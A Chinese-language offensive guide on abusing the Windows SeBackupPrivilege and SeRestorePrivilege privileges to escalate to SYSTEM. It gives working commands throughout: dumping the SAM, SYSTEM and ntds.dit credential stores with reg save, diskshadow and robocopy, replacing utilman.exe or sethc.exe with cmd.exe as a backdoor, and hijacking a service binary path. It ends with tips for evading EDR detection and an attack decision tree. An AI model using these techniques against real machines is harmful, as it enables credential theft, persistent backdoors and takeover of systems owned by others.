在 Windows 权限提升与横向移动的实战中,SeBackupPrivilege和SeRestorePrivilege这两个特权几乎可以称得上是“核武器级”存在。只要一个普通用户(甚至低权限账户)被加入Backup Operators组,或者被显式授予其中任意一个特权,就很可能实现从普通用户 → SYSTEM 的权限跃迁,甚至直接接管整台机器。
但非常重要的一点是:这两个特权的能力其实并不完全相同,它们在读取和写入上的表现有本质区别,实战中经常出现“以为自己有权限其实只能读不能写”或者“写的时候报错但读没问题”的情况。
一、两个特权的本质与内核机制区别
| 项目 | SeBackupPrivilege | SeRestorePrivilege | 两者都拥有时的能力 |
|---|---|---|---|
| 中文俗称 | 备份特权 | 还原特权 | 完整备份/还原特权(最强组合) |
| 主要内核标志 | FILE_FLAG_BACKUP_SEMANTICS(读取方向) | FILE_FLAG_BACKUP_SEMANTICS(写入方向) | 两者结合 |
| 能否无视DACL读取文件 | 是(几乎任意文件,包括被锁定的) | 是(但主要是写能力,读能力也附带) | 是 |
| 能否无视DACL写入文件 | 否(只能读,不能直接写) | 是(可覆盖、创建、修改高保护文件) | 是 |
| 能否修改文件所有权 | 否(只能读) | 是(配合 SeTakeOwnershipPrivilege 更强) | 是 |
| 能否修改 NTFS ACL | 否 | 是 | 是 |
| 典型对应系统角色 | Backup Operators 默认拥有 | Backup Operators 默认拥有 | Backup Operators / 显式授予两者 |
| 能否读取被排他锁定的文件 | 是(多数情况下) | 是(但不常用) | 是 |
| 能否覆盖系统关键文件 | 否(只能读出来,不能写回去) | 是(经典利用目标:utilman.exe、sethc.exe等) | 是 |
一句话总结区别:
- SeBackupPrivilege≈ 只开了“只读备份通道” → 你可以把几乎任何文件的内容读出来,但不能修改、覆盖、创建新文件到高保护位置
- SeRestorePrivilege≈ 开了“写入还原通道” → 你可以把内容写到几乎任何位置,甚至覆盖系统文件、修改所有权、ACL
- 两者同时拥有≈ 完整备份还原能力 → 读写通吃,几乎无视所有 NTFS 保护(除了极少数内核硬保护)
二、利用手法整理
(一)只拥有 SeBackupPrivilege 的利用方式(纯读能力)
reg save 导出注册表蜂窝(至今最经典、最稳定)
reg save HKLM\SAM sam.hive reg save HKLM\SYSTEM system.hive reg save HKLM\SECURITY security.hive→ 导出后用 secretsdump / impacket / samdump2 提取本地 hash
读取 ntds.dit(域控环境)
- diskshadow 创建持久化影子拷贝
- robocopy /B 拷贝 ntds.dit + SYSTEM hive
- impacket-secretsdump 提取域 hash(DCSync 等价)
使用 SeBackupPrivilegeUtils 模块读取任意文件(PowerShell 最方便)
Import-Module.\SeBackupPrivilegeUtils.dllImport-Module.\SeBackupPrivilegeCmdLets.dllSet-SeBackupPrivilegeCopy-FileSeBackupPrivilege"C:\Windows\system32\config\SAM""c:\temp\sam.bak"自写程序 + FILE_FLAG_BACKUP_SEMANTICS 读取
最常用 C# 写法(2025年后 Rust/Go 也流行):constuintBACKUP_SEMANTICS=0x02000000;usingvarfs=newFileStream(@"C:\Windows\system32\config\SAM",FileMode.Open,FileAccess.Read,FileShare.ReadWrite,4096,(FileOptions)BACKUP_SEMANTICS);wbadmin + vssadmin 老派玩法(新系统基本失效,但某些老域控仍可)
wbadmin start backup -backupTarget:E: -include:C: -allCritical -quiet
(二)只拥有 SeRestorePrivilege 的利用方式(重点:可写)
最经典提权手法
copy /Y c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe重启 → 锁屏界面 Win+U → 弹出 SYSTEM 权限 cmd
替换 sethc.exe(粘滞键后门)
copy /Y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe锁屏连续按 Shift 5次 → SYSTEM cmd
覆盖常见服务可执行文件(需服务可停止)
- AppReadiness
- spoolsrv
- Appinfo
- TrustedInstaller(较难)
sc config AppReadiness binPath= "C:\temp\malicious.exe" sc stop AppReadiness sc start AppReadiness直接写入高保护目录(配合 SeRestore)
echo malicious > "C:\Windows\System32\config\SAM"(极度危险,极易蓝屏)
修改文件所有权 & ACL(最彻底玩法)
takeown /F "C:\Windows\System32\config\SAM" /A icacls "C:\Windows\System32\config\SAM" /grant Administrators:F
(三)两者都拥有时的最强组合玩法
- 读 + 写 = 任意文件任意位置任意操作
- 最危险组合:直接修改 SAM、SYSTEM、ntds.dit、驱动文件、组策略文件等
- 常见核弹级玩法(慎用,会搞崩系统):
- 直接覆盖 SAM 文件 → 改本地管理员密码
- 写恶意驱动到 drivers 目录 + 加载(需绕过驱动签名强制)
- 修改 BCD/BOOTMGR → 持久化后门
- 覆盖 lsass.exe → 注入恶意 lsass(极高检测)
三、2026年新变化与限制
Windows 11 24H2 / Server 2025 强化了以下保护:
- TrustedInstaller 保护的很多文件即使有 SeRestore 也不一定能覆盖(内核新增硬性校验)
- utilman.exe / sethc.exe 被越来越多环境加了文件完整性校验(尤其企业环境)
- lsass.exe 保护等级提升(Credential Guard 更普及)
Defender & EDR 检测逻辑升级(2025年后明显加强)
- reg save SAM/SYSTEM → 高危行为(几乎必报)
- robocopy /B 或 /ZB → 被大部分商用 EDR 标记为可疑
- 频繁使用 FILE_FLAG_BACKUP_SEMANTICS 的进程 → 被重点监控
- CreateFile + SeBackupPrivilege 调用链 → 很多 EDR 能抓到
目前仍然相对隐蔽的绕过思路(2026 年初):
- 不直接用 robocopy,用自己写的 C#/Rust 程序调用 BackupRead/BackupWrite API
- 用 Volume Shadow Copy Service (VSS) 间接读取,不直接碰特权标志
- 用合法备份软件(Veeam、Acronis 等)进行二次利用
- 先把文件读到内存,再通过其他通道写出(内存马、反射加载等)
四、实战决策树(建议优先级)
whoami /priv 看到 Backup/Restore 特权了吗? ↓ 是 是否在域控? ↓ 是 ──> diskshadow + robocopy ntds.dit → 优先 ↓ 否 是否有 SeRestorePrivilege? ↓ 是 ──> 优先尝试 utilman.exe / sethc.exe 替换(最快) ↓ 否 只剩 SeBackupPrivilege ↓ 优先 reg save SAM/SYSTEM → 提取 hash ↓ 次选 SeBackupPrivilegeUtils 模块读取敏感文件 ↓ 最后考虑自写程序读取五、总结
在 2026 年的 Windows 环境下,SeBackupPrivilege + SeRestorePrivilege仍然是权限提升里最直接、最暴力的组合之一。
- 只有 SeBackup → 基本等于“能 dump hash 就赢一半”
- 只有 SeRestore → 经典 utilman/sethc 替换仍然是最高效提权路径
- 两者都有 → 几乎无解,除非系统开了 Credential Guard + 内核完整性保护 + 强 EDR
)
